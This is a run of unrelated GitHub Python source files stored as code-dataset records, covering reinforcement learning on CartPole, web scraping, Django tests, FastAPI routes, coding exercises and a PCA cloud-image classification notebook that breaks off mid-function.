self.params = list(my_product(params))\n self.current_param = 0\n self.seed = seed\n self.envs = []\n \n def next_task(self):\n params = self.params[self.current_param]\n params_tuple = transform_dict_to_tuple(params)\n env = CartPoleEnv(**params)\n env.seed(self.seed)\n self.current_param+=1\n self.envs.append({params_tuple : env})\n return self.envs\n \n def get_env(self, index):\n params = self.params[index]\n env = CartPoleEnv(**params)\n env.seed(self.seed)\n return env \n\nclass Queue():\n def __init__(self, capacity):\n self.capacity = capacity-1\n self.queue = []\n self.nb_elems = -1\n \n def add(self, elem):\n if self.nb_elems == self.capacity:\n self.pop()\n self.add(elem)\n else:\n self.queue.append(elem)\n self.nb_elems+=1\n \n def pop(self): \n self.nb_elems -=1\n return self.queue.pop(0)\n\n\n# In[5]:\n\n\n\ndef dqn(envs, agent = None, n_episodes=20, max_t=200, eps_start=1, eps_end=0.01, eps_decay=0.995, desactivate_noise = False):\n scores_test = [Queue(50) for i in range(len(envs))]\n scores = [] \n scores_window = deque(maxlen=100) \n eps = eps_start \n env = list(envs[-1].values())[0]\n for i_episode in range(1, n_episodes+1):\n\n state = env.reset()\n score = 0\n if desactivate_noise:\n eps = 0\n \n for t in range(max_t):\n action = agent.act(state = state,task_idx = len(envs)-1, eps = eps )\n next_state, reward, done, _ = env.step(action)\n agent.step(state, action, reward, next_state, done)\n state = next_state\n score += reward\n if done:\n break \n test_dqns(scores_test, envs, agent)\n\n score_averaged = scores_test[-1].queue[-1]\n scores_window.append(score_averaged) \n scores.append(score_averaged) \n eps = max(eps_end, eps_decay*eps)\n \n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end=\"\")\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))\n if np.mean(scores_window)>=195.0 and i_episode>100:\n break\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\n #torch.save(agent.qnetwork_local.state_dict(), 'models/checkpoints/checkpoint.pth')\n \n scores_test_list = [np.array(scores_test[i].queue).mean() for i in range(len(scores_test)) ]\n return scores, scores_test_list\n\n\ndef test_dqns(scores_test, envs, agent, n_episodes = 5, max_t = 1000):\n for i in range(len(envs)):\n env_i = list(envs[i].values())[0]\n scores_test[i].add(test_dqn(env_i, agent, i, n_episodes, max_t))\n \n \ndef test_dqn(env, agent, task_idx = 0, n_episodes = 1, max_t=1000):\n _scores = 0 \n for i_episode in range(1, n_episodes+1):\n _state = env.reset()\n _score = 0\n for t in range(max_t):\n _action = agent.act(_state, task_idx, 0.0)\n _next_state, _reward, _done, _ = env.step(_action)\n _state = _next_state\n _score += _reward\n if _done:\n break \n _scores += _score \n return _scores/n_episodes\n\n\n#

Agent definition

\n\n# In[6]:\n\n\n#agent = Q_learner(state_size=4, action_size=2, seed=0, hiddens = [100,100], args = args)\nhiddens = [100,100]\n\n\n\n# In[7]:\n\n\nparams = {\"length\": [1, 10], \n \"gravity\": [9.8, 1.62],\n \"seed\":[0]\n }\n\nprint(\"Params: (Seed, Length, Gravity, Force_mag)\")\nseed = 0\ndesactivate_noise = False\ntask_wrapper = Task_Wrapper(env_name,params)\nscores = dict()\ntest_scores = dict()\nfor task_id in range(len(task_wrapper.params)):\n \n print(\"------------ Task n°{}/{} ------------\".format(task_id+1,len(task_wrapper.params) ))\n envs = task_wrapper.next_task()\n param_tuple = list(envs[-1].keys())[0]\n print(\"Current param: {}\".format(param_tuple))\n\n \n if task_id == 0 :\n print(\"Let's first train a Vanilla network\")\n vanilla_agent = Q_learner(state_size=4, action_size=2, seed=0, hiddens = hiddens,\n args = args)\n _, test_score = dqn(envs, vanilla_agent)\n print(test_score)\n weights = vanilla_agent.get_weights()\n agent = BQ_learner(state_size=4, action_size=2, seed=0, hiddens = hiddens, \n args = args, prev_means = weights)\n desactivate_noise = True\n \n print(\"We can now start using VDQNs\")\n\n scores[param_tuple], test_scores[param_tuple] = dqn(envs, agent, desactivate_noise = desactivate_noise)\n agent.next_task()\n print(test_scores[param_tuple])\n\n\n# In[ ]:\n\n\ncolumns = [\"Task#\",\"Seed\", \"Gravity\", \"Length\", \"Force_mag\", \"Episode\", \"Score\"]\ndf = pd.DataFrame(columns = columns)\nfor j,param in enumerate(list(scores.keys())):\n print(j)\n values = scores[param]\n liste = []\n\n for i in range(len(values)):\n liste.append([j, param[0], param[1], param[2],param[3], i, values[i]])\n df2 = pd.DataFrame(data = liste, columns = columns)\n df = pd.concat([df,df2])\n df.reset_index()\npath= \"results/vdqn.csv\"\ndf.to_csv(path)\n\n\n# Test error\n\n# In[ ]:\n\n\nscore_list = [np.array(list(test_scores.keys()))]\nfor key in test_scores.keys():\n \n score_list.append(np.array(test_scores[key]))\nscores= np.array(score_list)\nprint(scores)\npath= \"results/vdqn.npy\"\nnp.save(path, scores)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"aicools/Continual-learning-RL","sub_path":"Continual-learning-RL-VDQN.py","file_name":"Continual-learning-RL-VDQN.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15573605849","text":"#ICP 2\n#Muhammad Mohzary\n\n# A program which reads weights (lbs.) of N students into a list and convert these weights to kilograms in a separate list using\n\n# the convert function to convert ibs to kgs\ndef convertInput(weights):\n weightskg = []\n for w in weights:\n t = w / 2.205\n kgVal = round(t,2)\n weightskg.append(kgVal)\n return(weightskg)\n\n\n#T ask user to enter the number of students\nstudentsN = int(input(\"Please enter the number of students: \"))\n# to initi the list\nweightslbsList = []\n\n# Using loop to enter student weights\nfor x in range(studentsN):\n w = float(input(\"Please enter student number \" + str(x + 1) +\" weight: \"))\n weightslbsList.append(w)\nprint(weightslbsList)\n# To call the convert function\nprint(convertInput(weightslbsList))","repo_name":"mohzary/python-deep-learning-f19","sub_path":"ICP 2/weights.py","file_name":"weights.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"24535784634","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymongo\nfrom scrapy.exceptions import DropItem\nfrom scrapy import log\nimport re\nfrom scrapy.conf import settings\n\nclass HypebeastPipeline(object):\n def process_item(self, item, spider):\n item[\"sub_title\"] = re.sub(r\"[】|【|,|。|「|」|,|.|!|\||:|・|?|\\n| | |.|》|《]+\",'',item[\"sub_title\"])\n item['hype_count'] = int(item['hype_count'].replace(\",\",''))\n item[\"article\"] = ''.join([x.replace(\" \",'').replace(\"\\n\",'') for x in item[\"article\"]])\n return item\n\nclass MongodbPipeline(object):\n def __init__(self):\n\n client = pymongo.MongoClient(\n host= settings[\"MONGODB_SERVER\"],\n port=settings[\"MONGODB_PORT\"])\n\n db = client[settings[\"MONGODB_DB\"]]\n self.client = db[settings[\"MONGODB_COLLECTION\"]]\n\n\n def process_item(self,item,spider):\n valid = True\n for data in item:\n if not data:\n valid = False\n raise DropItem(\"Missing {0}!\".format(data))\n if valid:\n self.client.insert(dict(item))\n log.msg(\"Item added to MongoDB database!\",\n level=log.DEBUG, spider=spider)\n return item\n","repo_name":"unrealandychan/Spiders","sub_path":"HypeBeast/HypeBeast/HypeBeast/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7795322769","text":"from mixer.backend.django import mixer\r\nimport pytest\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestThumbnailModel:\r\n \"\"\"Tests for Thumbnail model.\"\"\"\r\n\r\n def test_thumbnail_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_thumbnail = mixer.blend(\"api.Thumbnail\")\r\n assert str(test_thumbnail) == f\"Thumbnail size {test_thumbnail.size}px\"\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestAccountTierModel:\r\n \"\"\"Tests for AccountTier model.\"\"\"\r\n\r\n def test_account_tier_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_account_tier = mixer.blend(\"api.AccountTier\", name=\"test_tier\")\r\n assert test_account_tier.name == \"test_tier\"\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestExpiringLinkModel:\r\n \"\"\"Tests for ExpiringLink model.\"\"\"\r\n\r\n def test_expiring_link_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_expiring_link = mixer.blend(\"api.ExpiringLink\", name=\"test_link\")\r\n assert test_expiring_link.name == \"test_link\"\r\n\r\n def test_expiring_link_get_url(self):\r\n \"\"\"Tests get_url() model method.\"\"\"\r\n test_expiring_link = mixer.blend(\"api.ExpiringLink\")\r\n assert test_expiring_link.get_url() == \"/api/expiringlink/1/\"\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestImageModel:\r\n \"\"\"Tests for Image model.\"\"\"\r\n\r\n def test_account_tier_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_image = mixer.blend(\"api.Image\", name=\"test_image_name\")\r\n assert test_image.name == \"test_image_name\"\r\n","repo_name":"levy5434/ImageAPI","sub_path":"api/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9906273433","text":"class Weapon:\n def __init__(self, name, attack_power):\n self.name = name\n self.attack_power = attack_power\n\n\n\n \n \n\n def weapon_select(self):\n weapon1 = Weapon(\"The Toilet Brush of Death\", 15)\n weapon2 = Weapon(\"A Dumptruck Full of Microwaves\", 20)\n weapon3 = Weapon(\"The Rock of Freedom\", 15)\n\n weapon_selector = input(f\"Please Choose your weapon. Press 1 for {weapon1.name}. Press 2 for {weapon2.name}. Press 3 for {weapon3}\")\n if weapon_selector == \"1\":\n print(f\"You have choosen {weapon1}\")\n self.active_weapon = weapon1\n elif weapon_selector == \"2\":\n print(f\"You have choosen {weapon2}\")\n self.active_weapon == weapon2\n else:\n print(f\"You have selected {weapon3}\")\n self.active_weapon == weapon3\n ","repo_name":"sTuckerCurtin/Robots_VS-_Dinosaurs","sub_path":"weapon.py","file_name":"weapon.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16958022351","text":"import vtk\nimport vtkbone\nimport os\nimport argparse\n\n\n#Convert DICOM to MHA and AIM\n# Parse input arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"filePath\",\n type=str,\n help=\"The filepath\")\nparser.add_argument(\"outputImage\",\n type=str,\n help=\"The output Mha image\")\nargs = parser.parse_args()\n\nfilePath = args.filePath\noutputImage = args.outputImage\n\ndicomReader = vtk.vtkDICOMImageReader()\ndicomReader.SetDirectoryName(filePath)\ndicomReader.Update()\ndicomImage = dicomReader.GetOutput()\n\nmhaWriter = vtk.vtkMetaImageWriter()\n# mhaWriter.SetDirectoryName(filePath)\nmhaWriter.SetFileName(filePath+'/'+outputImage+'.mha')\nmhaWriter.SetInputData(dicomImage)\nmhaWriter.Write()\n\n#aimWriter = vtkbone.vtkboneAIMWriter()\n#aimWriter.SetInputData(dicomImage)\n#aimWriter.SetFileName(\"summed_image.aim\")\n#aimWriter.Update()\n","repo_name":"Bonelab/DECT_BoneAnalysis","sub_path":"dicom_Converter_batch.py","file_name":"dicom_Converter_batch.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"18901095498","text":"from fastapi import APIRouter, UploadFile, File, status, HTTPException\nfrom datetime import date\nfrom typing import List\nimport pandas as pd\n\nfrom schemas import IssuancePlanPerformance, GatherPlanPerformance, Success\nfrom crud import plan_exists, insert_plans, get_plans, get_dictionary_id, get_credits_body, get_payments_sum_by_date\nfrom models import Plan\nfrom helpers.types import to_date\n\nplans_router = APIRouter()\n\n@plans_router.post('/plans_insert')\nasync def post_plans(file: UploadFile = File(...)) -> Success:\n if not file.filename.endswith('.xlsx'):\n raise HTTPException(status.HTTP_400_BAD_REQUEST, detail='File format must be .xlsx')\n \n df = pd.read_excel(await file.read(), converters={0: lambda x: x.date(), 1: str, 2: float})\n\n plans: List[ dict[str, date | str | float ] ] = []\n for row in df.itertuples():\n plan_date: date = row[1]\n plan_name: str = row[2]\n plan_sum: float = row[3]\n plans.append( { 'period': plan_date, 'name': plan_name, 'sum': plan_sum })\n\n plan_models: List[Plan] = []\n for plan in plans:\n plan_period, plan_name, plan_sum = plan.values()\n \n if plan_period.day != 1:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail='Invalid period. Must be 1 day of month')\n \n if pd.isna(plan_sum):\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=f'Invalid plan sum')\n\n category_id = await get_dictionary_id(plan_name) \n if not category_id:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=f'No such category \\'{plan_name}\\'')\n \n if await plan_exists(plan_period, category_id):\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=f'The plan with period {plan_period} and category \\'{plan_name}\\' already exists in database')\n \n plan_models.append(Plan(period=plan_period, sum=plan_sum, category_id=category_id))\n\n plan_ids = await insert_plans(plan_models)\n\n return Success(values=plan_ids)\n\n\n@plans_router.get('/plans_performance')\nasync def get_plans_performance(year: int, month: int, day: int) -> List[IssuancePlanPerformance | GatherPlanPerformance]:\n try:\n for_date = date(year, month, day)\n except ValueError as ex:\n raise HTTPException(status.HTTP_400_BAD_REQUEST, detail=str(ex))\n plans_performance = []\n for plan in await get_plans(for_date):\n if plan.category.lower() == 'видача':\n issuance_sum = await get_credits_body(plan.period, for_date)\n complete_percent = issuance_sum / plan.sum * 100\n plan_performance = IssuancePlanPerformance(month=for_date.month, category=plan.category, sum=plan.sum, given_sum=issuance_sum, complete_percent=complete_percent)\n elif plan.category.lower() == 'збір':\n payments_sum = await get_payments_sum_by_date(plan.period, for_date)\n complete_percent = payments_sum / plan.sum * 100\n plan_performance = GatherPlanPerformance(month=for_date.month, category=plan.category, sum=plan.sum, gathered_sum=payments_sum, complete_percent=complete_percent)\n else:\n continue\n plans_performance.append(plan_performance)\n return plans_performance\n\n","repo_name":"Mlinzo/finance_api","sub_path":"app/routes/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"12860767752","text":"import json\n\nwith open(r\"C:\\Users\\vashi\\OneDrive\\Documents\\GitHub\\DS140823\\_23_json_file_handling\\demo.json\") as file:\n \n # reading json file and converting json data into dict\n data = json.load(file)\n print(data)\n print(type(data))\n\n\nwith open(r\"C:\\Users\\vashi\\OneDrive\\Documents\\GitHub\\DS140823\\_23_json_file_handling\\test.json\",\"w\") as file:\n data = {\n \"rno\":1,\n \"name\":\"Raj\",\n \"male\":True\n }\n # converted dict into json and stored it inside json file\n json.dump(data,file)\n","repo_name":"Sherly14/DS140823","sub_path":"Python/_23_json_file_handling/_2_json_file_reading_writing.py","file_name":"_2_json_file_reading_writing.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"7017251093","text":"\n\"\"\"\nThis gets the meta-data containing filenames, location in MB on where to start\nand the filesize\n\nThis is embedded in an iterative loop over process rank to decide which files\nand or chunks of files to send to each process\n\nInitial plan was to include the MPI send/recv here.\nKept this part wrapped to make more modular/easier to read\n\"\"\"\n\nimport os\nfrom mpi4py import MPI\n\ndef partitionMetaData(maxReadSize, input_dir, input_files, fCount_init, chunk, AddedFiles):\n\t\n\trunningFileSize = 0.0\n\tfCount = fCount_init\n\tNfiles = len(input_files)\n\n\tfilesnames_tmp = []\n\tbyteStart_tmp = []\n\tfilesize_tmp = []\n\t\n\twhile runningFileSize < maxReadSize:\n\t\tcurrentFileSize = os.path.getsize(input_dir + input_files[fCount])\n\t\t\n\t\tif chunk*maxReadSize < currentFileSize:\t\t### starts from chunk*maxReadSize and reads next\n\t\t\tfilesnames_tmp.append(input_files[fCount])\t### 10 MB for large files\n\t\t\tbyteStart_tmp.append((chunk - 1)*maxReadSize)\n\t\t\tfilesize_tmp.append(currentFileSize)\n\t\t\t\n\t\t\tchunk += 1\n\t\t\tAddedFiles = True\n\t\t\t\n\t\t\tif chunk*maxReadSize > currentFileSize: # dump rest of file here if there is < 10MB remaining\n\t\t\t\tfilesnames_tmp.append(input_files[fCount])\n\t\t\t\tbyteStart_tmp.append((chunk -1)*maxReadSize)\n\t\t\t\tfilesize_tmp.append(currentFileSize)\n\t\n\t\t\t\tfCount += 1\n\t\t\t\tAddedFiles = True\n\t\t\t\tif fCount >= Nfiles:\n\t\t\t\t\tbreak\n\t\t\t\tchunk = 1\n\t\t\tbreak\n\t\telse:\n\t\t\tfilesnames_tmp.append(input_files[fCount])\t## File is < 10 MB in size, add whole file\n\t\t\tbyteStart_tmp.append((chunk-1)*maxReadSize)\n\t\t\tfilesize_tmp.append(currentFileSize)\n\t\t\tfCount += 1\n\t\t\trunningFileSize += currentFileSize\n\t\t\tAddedfiles = True\n\t\t\tif fCount >= Nfiles:\n\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\n\treturn filesnames_tmp, byteStart_tmp, filesize_tmp, fCount, chunk, AddedFiles\n","repo_name":"DiegosNore/Telematica4","sub_path":"src/partitionMetaData.py","file_name":"partitionMetaData.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28701889921","text":"from functools import reduce\n\nwith open(\"input.txt\") as input_file:\n nums = [int(n) for n in input_file.read().split(\",\")]\n fuel_vals = []\n for i in range(min(nums), max(nums) + 1):\n fuel = 0\n for n in nums:\n dist = abs(i - n)\n step = sum(range(dist))\n fuel += dist + step\n fuel_vals.append(fuel)\n print(min(fuel_vals))\n","repo_name":"niklasschloegel/advent-of-code","sub_path":"2021/day-07/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"17295625490","text":"# (https://leetcode.com/problems/find-all-duplicates-in-an-array/\n\nnums = [4,3,2,7,8,2,3,1]\n\nx=[]\nfor i in nums:\n if nums.count(i)>1:\n x.append(i)\nprint(set(x))\n\n\nres = set()\nunique = set()\nfor number in nums:\n if number not in unique:\n unique.add(number)\n else:\n res.add(number)\nprint(list(res))\n\n\n#alternative\n\ndef findDuplicates(nums):\n res=[]\n for i in nums:\n if nums[abs(i)-1]<0:\n res.append(abs(i))\n else:\n nums[abs(i)-1]=-nums[abs(i)-1]\n return res\n\n \n \n\n\n\n\n","repo_name":"riaz-khan-16/Problem_Solving_with_Python","sub_path":"5_Leetcode_Sorting/41.find-all-duplicates-in-an-array.py","file_name":"41.find-all-duplicates-in-an-array.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"70959560178","text":"input_list = input().split(\" \")\r\ncount_shuffles = int(input())\r\n\r\nworking_list = input_list.copy()\r\nloop_number = len(working_list)\r\nloop_number = int(loop_number/2)\r\nshuffle_list = []\r\nlist_a = []\r\nlist_b = []\r\n\r\n\r\nfor i in range(0, count_shuffles):\r\n list_a = working_list[0:loop_number]\r\n list_b = working_list[loop_number:]\r\n shuffle_list = []\r\n for index in range (0, loop_number):\r\n shuffle_list. append(list_a[index])\r\n shuffle_list. append(list_b[index])\r\n working_list = shuffle_list\r\n\r\nprint(working_list)","repo_name":"nikolay-parapanov/SoftUni","sub_path":"02- Fundamentals/03- Exercise- Lists Basics/05. Faro Shuffle.py","file_name":"05. Faro Shuffle.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"38549463367","text":"# ---\n# jupyter:\n# jupytext:\n# cell_metadata_filter: K,title,incorrectly_encoded_metadata,-all\n# formats: ipynb,py:percent\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.14.5\n# ---\n\n# %%\n#================ PART II ================#\n\n# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport os\n\nfrom tqdm import tqdm\nfrom math import trunc\n\nimport ML\n\n#The cloud dataset, 6go, np arrays 30+go\n#https://www.kaggle.com/datasets/christianlillelund/the-cloudcast-dataset?resource=download\n\n#The cloud dataset : dataset of suboptimal npy arrays to dataarray\n\n#Edited dataset after npy_to_dataarray.py computation\n#Data is now structured in 2 datasets for learning :\n #merged_darray_labels regroups the masked array of every cloud images by labels\n #Shapes info :\n #Time : roughly 365*24*4/15 files, ie one image every 15min\n #Label : the type of cloud, defined by its altitude\n #x : longitude coordinate\n #y : lattitude coordinates\n \n #merged_darray_borders regroups the borders of every cloud images by labels\n #Shapes info :\n #Time : roughly 365*24*4/15 files, ie one image every 15min (0-)\n #Label : the type of cloud, defined by its altitude (0-12)\n #x : longitude coordinate (0-767)\n #y : lattitude coordinates (0-767)\n \n\"\"\"\nSpecify the absolute path of the 'Project' folder location :\n\"\"\"\nabs_path = \"D:/Machine Learning/Project\"\n\npath_labels = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\npath_borders = abs_path+\"/TheCloudDataset_labelized_borders_train\"\n\nfiles = [os.path.join(path_labels, f) for f in os.listdir(path_labels) if f.endswith(\".nc\")]\narray = np.load(abs_path+\"/The cloud dataset/2017M01/0.npy\")\n\n# %%\nfig, ax = plt.subplots(4,8)\nfor k in range(32):\n if k<=15:\n plt.subplot(4,8,k+1)\n plt.imshow(np.load(abs_path+f\"/The cloud dataset/2017M01/{k*96}.npy\"), cmap='cool')\n plt.title(f\"{k+1}/01/2017\")\n if k<=15:\n plt.subplot(4,8,k+17)\n plt.imshow(np.load(abs_path+f\"/The cloud dataset/2018M01/{k*96}.npy\"), cmap='cool')\n plt.title(f\"{k+1}/01/2018\")\n\nplt.get_current_fig_manager().full_screen_toggle()\nplt.savefig(abs_path+\"/daily_img_2017_2018.png\")\nplt.close('all')\n\n# %%\n\"\"\"\nThe learning will follow these steps :\n 1 - PCA over every image to reduce its size and thus computation time\n 2 - 1vsAll algorithm over labels and borders\n 2bis - 1vsAll testing with the 2018 dataset (might merge it as well)\n 3 - NN over labels and borders\n 3b - NN testing with the 2018 dataset (might merge it as well)\n 4 - comparison of the algorithm results\n 4b - testin of the two algorithm over raw input (live images from the EUMETSAT)\n 5 - trying to improve the results by combining labels and borders when learning\n 5b - testing over 2018 dataset\n 5c - testing over raw input (live images from the EUMETSAT)\n \nDepending on the difficulty, file size and computation time, every step may not be acheived, if not sucessfull.\n\"\"\"\n\n# %%\n#================ 1 - PCA ================#\n\n# %%\n\ndef slice_array(array, sclices=6):\n \n arr_blur_reduced = array[::sclices, ::sclices]\n \n return arr_blur_reduced\n \n\ndef pca_array(array, k_main_components, normalization=False):\n \n array_pca, pca_info = ML.pca(array, k_main_components, normalization)\n \n return array_pca, pca_info\n\n\ndef pca_recoverArray(array_pca, pca_info):\n \n array_recover = ML.pca_recoverData(array_pca, pca_info)\n \n return array_recover\n\n\ndef compute_pca_dataset(dataset, k_main_components=50):\n \n dataarray_pca = dataset['data'].values.astype(np.float32)\n len_time, len_label, m, n = dataarray_pca.shape\n \n m, n = m//6, n//6\n \n flattened_pca_array = np.zeros((len_label, len_time//8, m*k_main_components))\n for t in tqdm(range(0, len_time, 8)):\n for l in range(len_label):\n try:\n array_pca = pca_array(slice_array(dataarray_pca[t,l,:,:]), k_main_components)[0]\n except:\n array_pca = np.zeros((m, k_main_components))\n flattened_pca_array[l, t//8, :] = array_pca.flatten()\n \n return flattened_pca_array\n\n\ndef save_pca_flattened_dataset(path_in, path_out, k_main_components=50):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n\n for k in tqdm(range(len(files))):\n dataset = xr.open_dataset(f\"{files[k]}\")\n flattened_pca_array = compute_pca_dataset(dataset, k_main_components)\n flattened_pca_array = xr.DataArray(flattened_pca_array, dims=('time', 'data_pca', 'label'))\n flattened_pca_array.to_netcdf(f\"{path_out}/pca_k{k_main_components}_{k}.nc\")\n \n return None\n\n# %% TEST COMPUTE PCA\ndataset = xr.open_dataset(abs_path+\"/TheCloudDataset_labelized_arrays_train/2017M01_concatenated_darray_separated_0.nc\")\narray_pca = compute_pca_dataset(dataset, k_main_components=10)\ndarray_pca = xr.DataArray(array_pca, dims=('time', 'data_pca', 'label'))\n\n# %% TEST PCA&RECOVER ARRAY\narray = xr.open_dataset(abs_path+\"/TheCloudDataset_labelized_arrays_train/2017M01_concatenated_darray_separated_0.nc\")['data'].values[0,0,:,:] \narray = slice_array(array)\n\narray_pca, array_pca_info = pca_array(array, k_main_components=30, normalization=True)\narray_pca_recovered = pca_recoverArray(array_pca, array_pca_info)\n\nl = [array, array_pca, array_pca_recovered]\nfor k in range(3):\n plt.subplot(1,3,k+1)\n plt.imshow(l[k], cmap='gray')\nplt.suptitle(\"Image 0 label 0 / PCA img / PCA img recovered\")\nplt.savefig(abs_path+\"/1b_pca_example_k30.png\")\n\n# %% TEST PCA&RECOVERS BORDER\narray = xr.open_dataset(abs_path+\"/TheCloudDataset_labelized_borders_train/2017M01_concatenated_darray_separated_borders_0.nc\")['data'].values[0,0,:,:] \n\narray_pca, array_pca_info = pca_array(array, k_main_components=50)\narray_pca_recovered = pca_recoverArray(array_pca, array_pca_info)\n\nl = [array, array_pca, array_pca_recovered]\nfor k in range(3):\n plt.subplot(1,3,k+1)\n plt.imshow(l[k], cmap='gray')\n\n# %% PCA COMPUTATION ARRAYS\nk_main_components = 20\npath_in = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\npath_out = abs_path+f\"/TheCloudDataset_labelized_arrays_train_pca_k{k_main_components}\"\n\n#Dirty fonction calling to store the computed pca datasets\nsave_pca_flattened_dataset(path_in, path_out, k_main_components) \n\n# %% PCA COMPUTATION BORDERS\nk_main_components = 10\npath_in = abs_path+\"/TheCloudDataset_labelized_borders_train\"\npath_out = abs_path+\"/TheCloudDataset_labelized_borders_train_pca_k{k_main_components}\"\n\n#Dirty fonction calling to store the computed pca datasets\nsave_pca_flattened_dataset(path_in, path_out, k_main_components) \n\n# %%\n\"\"\" \nOver the extremely high complexity and time consumption of the computation, choices had to be made :\n(pca computation and writing duration was ~6h)\n 1) The PCA had to be very rough, with 10 k main components selected (might try 20-30 afterwards)\n 2) Data had to be reduced again : instead of 15min slices, it's now 2 hours. The impact should be small\n enough over the futur learning, and it's still better than taking instead only 2.5 months of the whole year\n instead (for the same data weight reduction) and thus missing the seasons variations\n 3) Data is now stored as non-compressed float 32, which should speed up the learning computation\n 4) Data is still stored as individual daily arrays, as merging is still to heavy :\n - As for the previous compression, there are still too many files to load in the memory\n - Lazy computation may work better on uncompressed data, but might be counter effective when\n computing the neural network learning.\n\"\"\"\n\n# %%\n#================ 2 - OneVsAll ALGORITHM ================#\n\n# %%\n\ndef data_toarray_selection(path_in, variable, sample_size=324, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n #To check the length of a vector of an image (may change depending on the PCA)\n data_info = xr.open_dataset(files[0])[variable].values\n len_data = data_info.shape[-1]\n len_data_daily = data_info.shape[-2]\n \n y = np.zeros((sample_size*len_data_daily))\n X = np.zeros((sample_size*len_data_daily, len_data))\n \n print(X.shape)\n \n for t in tqdm(range(sample_size*len_data_daily)):\n X[t, :] = xr.open_dataset(files[t//len_data_daily])[variable].values[t%num_labels, t%len_data_daily, :].flatten()\n y[t] = t%num_labels\n \n return X, y\n\n\ndef OneVsAll_dataset(path_in, variable, sample_size=324, lambda_=1, num_labels=13, itterations=10):\n \n print(\"Loading of X and y\")\n X, y = data_toarray_selection(path_in, variable, sample_size, num_labels)\n print(\"X and y finished loading\")\n \n trained_theta = ML.oneVsAll(X, y, num_labels, lambda_, tol=1e-3)[1]\n \n return trained_theta, X, y\n\n\ndef OneVsAll_testDataset_pca(path_in, trained_theta, variable, sample_size=30, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n #To check the length of a vector of an image (may change depending on the PCA)\n data_info = xr.open_dataset(files[0])[variable].values\n len_data = data_info.shape[-1]\n len_data_daily = data_info.shape[-2]\n \n X = np.zeros((sample_size*len_data_daily, len_data))\n for t in tqdm(range(sample_size*len_data_daily)):\n X[t, :] = xr.open_dataset(files[t//len_data_daily])[variable].values[t%num_labels, t%len_data_daily].flatten()\n \n p = ML.predictOneVsAll(trained_theta[:,1:], X)\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, sample_size*len_data_daily, num_labels):\n if p[t] == k:\n success_of_label_k+=1\n success_of_label_k = success_of_label_k / (sample_size*len_data_daily/num_labels)\n print(\"Success of label\", k, \"is : \", success_of_label_k*100, \"%\")\n return p\n\n\ndef OneVsAll_testArray(path_in, trained_theta, variable, sample_size=30, num_labels=13, k_main_components=10, slices=6):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".npy\")]\n size_array_pca = np.load(files[0]).shape[0]*k_main_components\n \n X = np.zeros((sample_size*num_labels, size_array_pca//slices))\n for t in 